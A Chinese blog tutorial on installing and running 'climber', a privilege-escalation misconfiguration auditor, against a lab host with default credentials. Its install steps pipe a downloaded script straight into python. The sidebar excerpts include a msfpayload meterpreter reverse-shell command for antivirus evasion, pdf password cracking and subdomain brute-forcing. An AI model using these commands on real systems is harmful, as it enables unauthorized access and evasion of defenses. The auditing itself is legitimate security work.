使用climber进行安全检查

最新推荐文章于 2015-01-17 00:36:05 发布
最新推荐文章于 2015-01-17 00:36:05 发布
阅读量144 收藏
点赞数
分类专栏: 安全审计 kali 文章标签: python 操作系统 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16188/article/details/82606557
版权
climber:Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation
clibmer是一个自动审计工具,用来检查UNIX/Linux系统是否含有可以导致提权的错误配置。可以进行本机审计以及远程主机审计。
一)安装
1)安装easy_install 
wget https://bootstrap.pypa.io/ez_setup.py -O - | python

2)安装pip 
easy_install pip

3)安装paramiko 
pip install paramiko

4)安装ecdsa 
wget 'https://pypi.python.org/packages/source/e/ecdsa/ecdsa-0.11.tar.gz#md5=8ef586fe4dbb156697d756900cb41d7c'
tar vxf ecdsa-0.11.tar.gz
cd ecdsa-0.11/
python setup.py install

5)下载climber代码,解压 
wget https://github.com/raffaele-forte/climber/archive/master.zip
unzip master.zip

二)运行climber
climber的运行方式有两种
一种是命令行指定,另一种是交互式
1)命令行方式
a)进入climber的文件夹,查看文件结构: 
root@kali:~/climber-master# ls
climber.py  Exscript  html  LICENSE  plugins  README.md  templates

这里我只看过plugin文件夹,plugin文件夹下又含有若干子文件夹,这些子文件夹叫做category,用于在命令行参数中指定--category参数 
root@kali:~/climber-master# ls plugins/
file_systems  networking  operating_system  ssh  users  website


b) 
root@kali:~/climber-master# ./climber.py -h
usage: climber.py [-h] [-v] [--host HOST] [--port PORT] [--ssh] [--telnet]
                  [--username USERNAME] [--password PASSWORD]
                  [--category CATEGORY] [--plugin PLUGIN]

Automated auditing tool to check UNIX/Linux systems misconfigurations which
may allow local privilege escalation

optional arguments:
  -h, --help           show this help message and exit
  -v, --version        show program's version number and exit

connection:
  --host HOST          set hostname or ip
  --port PORT          set port number
  --ssh                set ssh connection
  --telnet             set telnet connection

authentication:
  --username USERNAME  set username
  --password PASSWORD  set password

plugins:
  --category CATEGORY  set category
  --plugin PLUGIN      set plugin

[color=blue]--plugin:用于指定plugin的路径
--category:用于指定category类型,即我们在plugin文件夹中看到的子文件夹,[b]如果不指定则为全部category都测试。[/b][/color]

c)使用networking来运行命令 
./climber.py --username msfadmin --password msfadmin --host 192.168.59.142 --port 22 --ssh  --category networking

[img]http://dl2.iteye.com/upload/attachment/0101/8102/1d07019e-135d-3b9a-adef-5abe7928cdbb.jpg[/img]
从上图可以看到,执行结果保存在文件/root/climber/192.168.59.142-1412919034/index.html中,使用浏览器打开该文件,可以看到相应结果
[img]http://dl2.iteye.com/upload/attachment/0101/8104/c226e579-f171-32b1-bf33-4c1e3fe1388e.jpg[/img]

二)使用交互式
a)使用networking分类 
root@kali:~/climber-master# ./climber.py   --category networking

b)设置相应参数
[img]http://dl2.iteye.com/upload/attachment/0101/8106/085543bd-1757-304e-bacb-6e58eff0e62d.jpg[/img]
iteye_16188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ice-Climber
03-26
Ice-Climber
解决wifi 无法开启– 软体启动流程修改
Climber
07-19 8203
wifi 启动流程 系统根据以下流程开启wifi   1、载入wifi kernel module。 在wifi kernel module 中,主要是透过ioctl 的方式与user space 下运行的wpa_supplicant 进行沟通。另外在硬体的实现上,由于CPU 需要有另一个介面与wifi chip 进行沟通,如wifi firmware 的载入、command request...
CLImberCLI
03-03
使用CLImber的目标是使它尽可能的小和可移植。 .NET Standard 2.0和C#v7.3 而已。 没有其他库,依赖项或技术。 应该注意的是,CLImber确实使用反射来完成其大部分工作。 设置 在NuGet上搜索JM.CLImber 使用 ...
express-climber
05-12
npm install --save express-climber 该软件包旨在列出在路由器或应用程序中声明的所有路由。 它已在4.13.3版的express上进行了测试。 请告诉我该模块是否在另一个版本中失败。 中间件或路由器处理程序具有名称,...
ASP模板引擎Climber
12-19
于是有了自己写一个的想法,在网上搜索了很久,没有能用的,Climber 就这样诞生了。当前版本 Climber 1.0.0 。现已经支持包含功能{include("")},普通变量解析{$var},暂时未实现对象及记录集的解析功能。
Tux Climber-开源
04-27
Tux Climber的灵感来自冰冷的塔楼。 这是一款平台攀登,非常动态且外观漂亮的3D街机游戏。 主要侧重于游戏性。 您的目标是在不跌倒的情况下尽可能多地爬上地板,或者只是做一些很酷的组合。 使用OpenGL,SDL和
[译]nmap绕过防火墙
iteye_16188的博客
10-17 4886
原文地址:http://resources.infosecinstitute.com/nmap-evade-firewall-scripting/ [color=blue]TCP ACK Scan (-sA)[/color] 发送ACK数据报比发送SYN数据包更好,因为如果远端主机存在主动防火墙,那么由于防火墙对于ACK数据报不产生log,因为防火墙把ACK数据包当成SYN数据包的应答。TCP...
nslookup用ip查域名
iteye_16188的博客
08-29 2655
在一次信息侦查中发现,可以使用nslookup来反向确认域名服务器(不是所有的都好使)。 root@kali:~# nslookup > [color=red]ip_addr[/color] Server: 192.168.59.2 Address: 192.168.59.2#53 Non-authoritative answer: [color=re...
kali破解pdf密码
iteye_16188的博客
08-28 1263
1. apt-get install pdfcrack 2. pdfcrack --help pdfcrack -f filename [OPTIONS]
kali更新exploit-db
iteye_16188的博客
12-12 1235
[code="java"]cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf archive.tar.bz2 rm archive.tar.bz2[/code]
Kali中使用nslookup
iteye_16188的博客
10-23 1153
支持下面的记录类型: - SOA : Start of Authority. Defines the zone name, an e-mail contact and various time and refresh values applicable to the zone. - A : the IPv4 address that belongs to machine name - AAA...
chm文件转换成pdf 文件
iteye_16188的博客
11-06 913
apt-get install chm2pdf chm2pdf --book example.chm example.pdf
快速暴力破解域名
iteye_16188的博客
09-18 755
参考http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/ 方法一 [color=red]cat subdomains.txt | xargs -P 122 -I subdomain dig +noall subdomain.microsoft.com +answer[/color] man xar...
w3af扫描DVWA中sql漏洞
iteye_16188的博客
10-10 725
使用burp拦截请求,删除请求中[code="xml"]GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1 Host: 192.168.59.142[/code] [color=blue]root@kali:~# cat w3af.txt[/color] User-Agent: Mozilla/5.0 (X11; Linux x86...
使用nmap扫描heartbled
iteye_16188的博客
08-13 721
1. wget http://nmap.org/svn/scripts/ssl-heartbleed.nse 2. wget http://nmap.org/svn/nselib/tls.lua 3. cp ssl-heartbleed.nse /usr/bin/../share/nmap/scripts/ 4. cp tls.lua /usr/bin/../share/nmap/nseli...
使用XSScrapy扫描xss漏洞
iteye_16188的博客
08-23 566
url:http://danmcinerney.org/xsscrapy-fast-thorough-xss-vulnerability-spider/ 1. apt-get install python-pip 2. pip install scrapy 3. pip install ipythog 4. pip install pybloom 5. git clone https...
[译]w3af指南(一)
iteye_16188的博客
09-23 558
原文出自: http://resources.infosecinstitute.com/w3af-tutorial/ w3af (Web Application audit and attack framework)是一个web安全审计框架。本文将学习w3af的大部分特性以及如何使用进行web渗透测试。 [b][color=red][注]原文写于2012年。最新的w3af是1.6.0....
gitrob--github信息收集
iteye_16188的博客
01-17 505
原文地址:[url]http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/[/url] 简介 [quote] Gitrob is a command line tool that can help organizations and security professionals find such sen...
使用Metasm来绕过杀毒软件
iteye_16188的博客
09-30 428
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件 1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary 2.拷贝metasm.rb文件和metasm文件夹到rub...
craxy climber脊线
最新发布
08-25
游戏的操作相对简单,玩家需要使用操纵杆和两个按钮来控制爬山者的移动。通过控制左侧和右侧两个手柄,玩家可以使爬山者向上攀爬、向下移动、左右移动或者收回双手等。但是玩家需要注意的是,高楼大厦上会有很多窗户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值